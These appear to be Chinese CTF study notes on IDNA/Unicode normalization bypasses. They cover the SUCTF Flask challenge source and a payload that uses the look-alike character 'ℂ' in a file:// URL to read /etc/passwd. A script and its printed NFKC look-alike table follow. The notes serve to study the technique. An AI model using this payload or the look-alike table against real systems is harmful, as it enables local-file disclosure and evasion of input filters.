遇到的编码漏洞问题

1.idna与utf-8编码漏洞

参考：https://www.cnblogs.com/cimuhuashuimu/p/11490431.html
https://github.com/python-hyper/hyperlink/issues/19

suctf-python-nginx
源码

from flask import Flask, Blueprint, request, Response, escape ,render_template
from urllib.parse import urlsplit, urlunsplit, unquote
from urllib import parse
import urllib.request

# Flask application object; the route handlers below are registered on it.
app = Flask(__name__)

# Index
@app.route('/', methods=['GET'])
def app_index():
    """Serve the landing page of the challenge."""
    template_name = 'index.html'
    return render_template(template_name)

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    """Fetch the URL passed in the ``url`` query parameter and return its body.

    The handler is written so that a URL naming ``suctf.cc`` verbatim is
    rejected (checks 1 and 2), while the fetch in check 3 requires the host to
    be ``suctf.cc`` *after* every label has gone through the ``idna`` codec.
    The checks therefore run on two different strings: the raw netloc and the
    normalized one. The ``idna`` codec applies nameprep (NFKC + case folding),
    so a look-alike label such as ``cℂ`` collapses to ``cc`` between the
    checks -- this is the gap the payload further down on this page uses.
    """
    # Untrusted input straight from the query string (request.args is the query
    # string even on POST). A missing parameter yields None here and fails inside
    # urlparse below rather than being rejected explicitly.
    url = request.args.get("url")
    # Check 1: hostname of the raw URL. .hostname is lower-cased and has
    # userinfo/port stripped, so this compares only the host part.
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    # Check 2: parts[1] is the whole netloc (user:pass@host:port), compared as-is.
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    # Normalize each dot-separated label with the idna codec and rebuild the
    # netloc from the result; non-ASCII look-alikes become plain ASCII here.
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    # Strip everything after the first space in the rebuilt URL.
    finalUrl = urlunsplit(parts).split(' ')[0]
    # Check 3: the hostname of the *normalized* URL must now be suctf.cc.
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        # The scheme is never restricted, so urlopen honours whatever the client
        # supplied (file://, ftp://, ...) and not only http(s)://; the payload
        # below relies on file://. timeout=2 only bounds the network wait.
        return urllib.request.urlopen(finalUrl, timeout=2).read()
    else:
        return "我扌 your problem? 333"

if __name__ == "__main__":
    # Listens on all interfaces on port 80 (the challenge's deployment setting).
    app.run(host='0.0.0.0', port=80)

payload

import urllib
from urllib import parse
from urllib.parse import urlsplit, urlunsplit

# Replays the challenge handler's three host checks offline so each step's
# view of the host can be printed. The look-alike character in the netloc is
# U+2102 (DOUBLE-STRUCK CAPITAL C).
url = "file://suctf.cℂ/../../../etc/passwd"

# Check 1: hostname of the raw URL (lower-cased, port/userinfo stripped).
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
    print('first')
    exit(1)
print(f'1 {host}')

# Check 2: the raw netloc, compared verbatim.
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
    print('sec')
    exit(2)
print(f'2 {host}')

# The idna codec (nameprep: case folding + NFKC) rewrites each label; the
# netloc is rebuilt from the normalized labels.
newhost = [label.encode('idna').decode('utf-8') for label in host.split('.')]
parts[1] = '.'.join(newhost)
# Strip everything after the first space in the URL.
finalUrl = urlunsplit(parts).split(' ')[0]

# Check 3: hostname of the normalized URL.
host = parse.urlparse(finalUrl).hostname
if host != 'suctf.cc':
    print('???')
    exit(3)
print(f'3 {host}')
print(finalUrl)
#print(urllib.request.urlopen(finalUrl).read())


解法 2：https://www.cnblogs.com/20175211lyz/p/11470200.html

Unicode安全问题

https://xz.aliyun.com/t/5402
https://www.blackhat.com/presentations/bh-usa-09/WEBER/BHUSA09-Weber-UnicodeSecurityPreview-PAPER.pdf
在线搜索 Unicode：https://www.compart.com/en/unicode/
python2构造字符对应的等效码表脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import json
from unicodedata import normalize


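def _nfkc_ascii_table(debug=False):
    """Map each ASCII character to the BMP code points that NFKC-fold to it.

    Scans U+0001..U+FFFF, normalizes every character with NFKC and keeps the
    first character of the result when it is ASCII and differs from the
    source. The resulting ``{ascii_char: [source_chars]}`` table lists the
    look-alike characters that a normalizing validator or database will
    silently turn into the ASCII key.

    Args:
        debug: when true, print every mapping as it is found.

    Returns:
        dict mapping a one-character ASCII str to the list of source chars.
    """
    try:
        to_char = unichr  # Python 2: chr() only covers 0..255 there
    except NameError:
        to_char = chr  # Python 3: chr() covers the whole code-point range
    tables = {}
    for i in range(1, 0x10000):
        src = to_char(i)
        # Only the first char of the normalized form is kept
        # (e.g. U+00BD '½' -> '1⁄2' -> '1').
        dst = normalize('NFKC', src)[0]
        if ord(dst) >= 128 or dst == src:
            continue
        if debug:
            # The original used dst.charAt(0) (JavaScript), which raised
            # AttributeError on every hit and left the table empty in debug
            # mode; ord(dst) is the Python equivalent. Printing a lone
            # surrogate can still fail on some consoles, so report and go on.
            try:
                print("%s (\\u%s) -- normalize --> %s (\\x%s)" % (
                    src, hex(i)[2:].rjust(4, '0'),
                    dst, hex(ord(dst))[2:]
                ))
            except Exception as e:
                print(repr(e))
        tables.setdefault(dst, []).append(src)
    return tables


def main(output_path="nfctable.txt", debug=False):
    """Build the NFKC look-alike table, write it as JSON and print it.

    Args:
        output_path: file the JSON table is written to.
        debug: forwarded to the table builder to print each mapping found.

    Returns:
        The table that was written, so callers need not re-read the file.
    """
    tables = _nfkc_ascii_table(debug=debug)
    # Text mode works on both Python 2 and 3: json.dump emits ASCII-escaped
    # str, which a "wb" handle rejects on Python 3.
    with open(output_path, "w") as fh:
        json.dump(tables, fh)
    print(tables)
    return tables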

if __name__ == '__main__':
    # Script entry point: builds the table, writes nfctable.txt and prints it.
    main()

得到

{" ": ["\u00a0", "\u00a8", "\u00af", "\u00b4", "\u00b8", "\u02d8", "\u02d9", "\u02da", "\u02db", "\u02dc", "\u02dd", "\u037a", "\u0384", "\u0385", "\u1fbd", "\u1fbf", "\u1fc0", "\u1fc1", "\u1fcd", "\u1fce", "\u1fcf", "\u1fdd", "\u1fde", "\u1fdf", "\u1fed", "\u1fee", "\u1ffd", "\u1ffe", "\u2000", "\u2001", "\u2002", "\u2003", "\u2004", "\u2005", "\u2006", "\u2007", "\u2008", "\u2009", "\u200a", "\u2017", "\u202f", "\u203e", "\u205f", "\u3000", "\u309b", "\u309c", "\ufc5e", "\ufc5f", "\ufc60", "\ufc61", "\ufc62", "\ufc63", "\ufe49", "\ufe4a", "\ufe4b", "\ufe4c", "\ufe70", "\ufe72", "\ufe74", "\ufe76", "\ufe78", "\ufe7a", "\ufe7c", "\ufe7e", "\uffe3"], "$": ["\ufe69", "\uff04"], "(": ["\u207d", "\u208d", "\u2474", "\u2475", "\u2476", "\u2477", "\u2478", "\u2479", "\u247a", "\u247b", "\u247c", "\u247d", "\u247e", "\u247f", "\u2480", "\u2481", "\u2482", "\u2483", "\u2484", "\u2485", "\u2486", "\u2487", "\u249c", "\u249d", "\u249e", "\u249f", "\u24a0", "\u24a1", "\u24a2", "\u24a3", "\u24a4", "\u24a5", "\u24a6", "\u24a7", "\u24a8", "\u24a9", "\u24aa", "\u24ab", "\u24ac", "\u24ad", "\u24ae", "\u24af", "\u24b0", "\u24b1", "\u24b2", "\u24b3", "\u24b4", "\u24b5", "\u3200", "\u3201", "\u3202", "\u3203", "\u3204", "\u3205", "\u3206", "\u3207", "\u3208", "\u3209", "\u320a", "\u320b", "\u320c", "\u320d", "\u320e", "\u320f", "\u3210", "\u3211", "\u3212", "\u3213", "\u3214", "\u3215", "\u3216", "\u3217", "\u3218", "\u3219", "\u321a", "\u321b", "\u321c", "\u321d", "\u321e", "\u3220", "\u3221", "\u3222", "\u3223", "\u3224", "\u3225", "\u3226", "\u3227", "\u3228", "\u3229", "\u322a", "\u322b", "\u322c", "\u322d", "\u322e", "\u322f", "\u3230", "\u3231", "\u3232", "\u3233", "\u3234", "\u3235", "\u3236", "\u3237", "\u3238", "\u3239", "\u323a", "\u323b", "\u323c", "\u323d", "\u323e", "\u323f", "\u3240", "\u3241", "\u3242", "\u3243", "\ufe35", "\ufe59", "\uff08"], ",": ["\ufe10", "\ufe50", "\uff0c"], "0": ["\u2070", "\u2080", "\u2189", "\u24ea", "\u3358", "\uff10"], "4": ["\u2074", 
"\u2084", "\u2158", "\u2463", "\u248b", "\u32b5", "\u32b6", "\u32b7", "\u32b8", "\u32b9", "\u32ba", "\u32bb", "\u32bc", "\u32bd", "\u32be", "\u32c3", "\u335c", "\u33e3", "\uff14"], "8": ["\u2078", "\u2088", "\u2467", "\u248f", "\u32c7", "\u3360", "\u33e7", "\uff18"], "<": ["\ufe64", "\uff1c"], "@": ["\ufe6b", "\uff20"], "D": ["\u01c4", "\u01c5", "\u01f1", "\u01f2", "\u1d30", "\u2145", "\u216e", "\u24b9", "\uff24"], "H": ["\u1d34", "\u210b", "\u210c", "\u210d", "\u24bd", "\u32cc", "\u3390", "\u33cb", "\uff28"], "L": ["\u013f", "\u01c7", "\u01c8", "\u1d38", "\u2112", "\u216c", "\u24c1", "\u32cf", "\uff2c"], "P": ["\u1d3e", "\u2119", "\u24c5", "\u3250", "\u33a9", "\u33d7", "\u33d9", "\u33da", "\uff30"], "T": ["\u1d40", "\u2121", "\u2122", "\u24c9", "\u3394", "\uff34"], "X": ["\u2169", "\u216a", "\u216b", "\u24cd", "\uff38"], "\\": ["\ufe68", "\uff3c"], "`": ["\u1fef", "\uff40"], "d": ["\u01c6", "\u01f3", "\u1d48", "\u2146", "\u217e", "\u24d3", "\u3372", "\u3377", "\u3378", "\u3379", "\u3397", "\u33c8", "\uff44"], "h": ["\u02b0", "\u210e", "\u24d7", "\u3371", "\u33ca", "\uff48"], "l": ["\u0140", "\u01c9", "\u02e1", "\u2113", "\u217c", "\u24db", "\u33d0", "\u33d1", "\u33d2", "\u33d3", "\uff4c"], "p": ["\u1d56", "\u24df", "\u3376", "\u3380", "\u338a", "\u33b0", "\u33b4", "\u33ba", "\u33d8", "\uff50"], "t": ["\u1d57", "\u24e3", "\uff54"], "x": ["\u02e3", "\u2093", "\u2179", "\u217a", "\u217b", "\u24e7", "\uff58"], "|": ["\uff5c"], "#": ["\ufe5f", "\uff03"], "'": ["\uff07"], "+": ["\u207a", "\u208a", "\ufb29", "\ufe62", "\uff0b"], "/": ["\uff0f"], "3": ["\u00b3", "\u00be", "\u2083", "\u2157", "\u215c", "\u2462", "\u248a", "\u325a", "\u325b", "\u325c", "\u325d", "\u325e", "\u325f", "\u32b1", "\u32b2", "\u32b3", "\u32b4", "\u32c2", "\u335b", "\u33e2", "\u33fd", "\u33fe", "\uff13"], "7": ["\u2077", "\u2087", "\u215e", "\u2466", "\u248e", "\u32c6", "\u335f", "\u33e6", "\uff17"], ";": ["\u037e", "\ufe14", "\ufe54", "\uff1b"], "?": ["\u2047", "\u2048", "\ufe16", "\ufe56", 
"\uff1f"], "C": ["\u2102", "\u212d", "\u216d", "\u24b8", "\u33c6", "\u33c7", "\uff23"], "G": ["\u1d33", "\u24bc", "\u3387", "\u3393", "\u33ac", "\u33c9", "\uff27"], "K": ["\u1d37", "\u212a", "\u24c0", "\u3385", "\u33cd", "\u33ce", "\uff2b"], "O": ["\u1d3c", "\u24c4", "\uff2f"], "S": ["\u2120", "\u24c8", "\u33dc", "\uff33"], "W": ["\u1d42", "\u24cc", "\u33dd", "\uff37"], "[": ["\ufe47", "\uff3b"], "_": ["\ufe33", "\ufe34", "\ufe4d", "\ufe4e", "\ufe4f", "\uff3f"], "c": ["\u1d9c", "\u2105", "\u2106", "\u217d", "\u24d2", "\u3388", "\u339d", "\u33a0", "\u33a4", "\u33c4", "\u33c5", "\uff43"], "g": ["\u1d4d", "\u210a", "\u24d6", "\u33ff", "\uff47"], "k": ["\u1d4f", "\u24da", "\u3384", "\u3389", "\u338f", "\u3391", "\u3398", "\u339e", "\u33a2", "\u33a6", "\u33aa", "\u33b8", "\u33be", "\u33c0", "\u33cf", "\uff4b"], "o": ["\u00ba", "\u1d52", "\u2092", "\u2134", "\u24de", "\u3375", "\uff4f"], "s": ["\u017f", "\u02e2", "\u24e2", "\u33db", "\ufb05", "\ufb06", "\uff53"], "w": ["\u02b7", "\u24e6", "\uff57"], "{": ["\ufe37", "\ufe5b", "\uff5b"], "\"": ["\uff02"], "&": ["\ufe60", "\uff06"], "*": ["\ufe61", "\uff0a"], ".": ["\u2024", "\u2025", "\u2026", "\ufe19", "\ufe30", "\ufe52", "\uff0e"], "2": ["\u00b2", "\u2082", "\u2154", "\u2156", "\u2461", "\u2473", "\u2489", "\u249b", "\u3251", "\u3252", "\u3253", "\u3254", "\u3255", "\u3256", "\u3257", "\u3258", "\u3259", "\u32c1", "\u335a", "\u336c", "\u336d", "\u336e", "\u336f", "\u3370", "\u33e1", "\u33f3", "\u33f4", "\u33f5", "\u33f6", "\u33f7", "\u33f8", "\u33f9", "\u33fa", "\u33fb", "\u33fc", "\uff12"], "6": ["\u2076", "\u2086", "\u2465", "\u248d", "\u32c5", "\u335e", "\u33e5", "\uff16"], ":": ["\u2a74", "\ufe13", "\ufe55", "\uff1a"], ">": ["\ufe65", "\uff1e"], "B": ["\u1d2e", "\u212c", "\u24b7", "\u33c3", "\uff22"], "F": ["\u2131", "\u213b", "\u24bb", "\uff26"], "J": ["\u1d36", "\u24bf", "\uff2a"], "N": ["\u01ca", "\u01cb", "\u1d3a", "\u2115", "\u2116", "\u24c3", "\uff2e"], "R": ["\u1d3f", "\u20a8", "\u211b", "\u211c", "\u211d", 
"\u24c7", "\uff32"], "V": ["\u2164", "\u2165", "\u2166", "\u2167", "\u24cb", "\u2c7d", "\u33de", "\uff36"], "Z": ["\u2124", "\u2128", "\u24cf", "\uff3a"], "^": ["\uff3e"], "b": ["\u1d47", "\u24d1", "\u3374", "\uff42"], "f": ["\u1da0", "\u24d5", "\u3399", "\ufb00", "\ufb01", "\ufb02", "\ufb03", "\ufb04", "\uff46"], "j": ["\u02b2", "\u2149", "\u24d9", "\u2c7c", "\uff4a"], "n": ["\u01cc", "\u207f", "\u24dd", "\u3381", "\u338b", "\u339a", "\u33b1", "\u33b5", "\u33bb", "\uff4e"], "r": ["\u02b3", "\u1d63", "\u24e1", "\u33ad", "\u33ae", "\u33af", "\uff52"], "v": ["\u1d5b", "\u1d65", "\u2174", "\u2175", "\u2176", "\u2177", "\u24e5", "\uff56"], "z": ["\u1dbb", "\u24e9", "\uff5a"], "~": ["\uff5e"], "!": ["\u203c", "\u2049", "\ufe15", "\ufe57", "\uff01"], "%": ["\ufe6a", "\uff05"], ")": ["\u207e", "\u208e", "\ufe36", "\ufe5a", "\uff09"], "-": ["\ufe63", "\uff0d"], "1": ["\u00b9", "\u00bc", "\u00bd", "\u2081", "\u2150", "\u2151", "\u2152", "\u2153", "\u2155", "\u2159", "\u215b", "\u215f", "\u2460", "\u2469", "\u246a", "\u246b", "\u246c", "\u246d", "\u246e", "\u246f", "\u2470", "\u2471", "\u2472", "\u2488", "\u2491", "\u2492", "\u2493", "\u2494", "\u2495", "\u2496", "\u2497", "\u2498", "\u2499", "\u249a", "\u32c0", "\u32c9", "\u32ca", "\u32cb", "\u3359", "\u3362", "\u3363", "\u3364", "\u3365", "\u3366", "\u3367", "\u3368", "\u3369", "\u336a", "\u336b", "\u33e0", "\u33e9", "\u33ea", "\u33eb", "\u33ec", "\u33ed", "\u33ee", "\u33ef", "\u33f0", "\u33f1", "\u33f2", "\uff11"], "5": ["\u2075", "\u2085", "\u215a", "\u215d", "\u2464", "\u248c", "\u32bf", "\u32c4", "\u335d", "\u33e4", "\uff15"], "9": ["\u2079", "\u2089", "\u2468", "\u2490", "\u32c8", "\u3361", "\u33e8", "\uff19"], "=": ["\u207c", "\u208c", "\u2a75", "\u2a76", "\ufe66", "\uff1d"], "A": ["\u1d2c", "\u24b6", "\u3373", "\u33df", "\uff21"], "E": ["\u1d31", "\u2130", "\u24ba", "\uff25"], "I": ["\u0132", "\u1d35", "\u2110", "\u2111", "\u2160", "\u2161", "\u2162", "\u2163", "\u2168", "\u24be", "\u337a", "\uff29"], "M": 
["\u1d39", "\u2133", "\u216f", "\u24c2", "\u3386", "\u3392", "\u33ab", "\u33b9", "\u33bf", "\u33c1", "\uff2d"], "Q": ["\u211a", "\u24c6", "\uff31"], "U": ["\u1d41", "\u24ca", "\uff35"], "Y": ["\u24ce", "\uff39"], "]": ["\ufe48", "\uff3d"], "a": ["\u00aa", "\u1d43", "\u1e9a", "\u2090", "\u2100", "\u2101", "\u24d0", "\u33c2", "\uff41"], "e": ["\u1d49", "\u2091", "\u212f", "\u2147", "\u24d4", "\u32cd", "\u32ce", "\uff45"], "i": ["\u0133", "\u1d62", "\u2071", "\u2139", "\u2148", "\u2170", "\u2171", "\u2172", "\u2173", "\u2178", "\u24d8", "\u33cc", "\uff49"], "m": ["\u1d50", "\u217f", "\u24dc", "\u3383", "\u338e", "\u3396", "\u339c", "\u339f", "\u33a1", "\u33a3", "\u33a5", "\u33a7", "\u33a8", "\u33b3", "\u33b7", "\u33bd", "\u33d4", "\u33d5", "\u33d6", "\ufad1", "\uff4d"], "q": ["\u24e0", "\uff51"], "u": ["\u1d58", "\u1d64", "\u24e4", "\uff55"], "y": ["\u02b8", "\u24e8", "\uff59"], "}": ["\ufe38", "\ufe5c", "\uff5d"]}

题目 [ASIS 2019] Unicorn shop -> wp：https://github.com/hyperreality/ctf-writeups/tree/master/2019-asis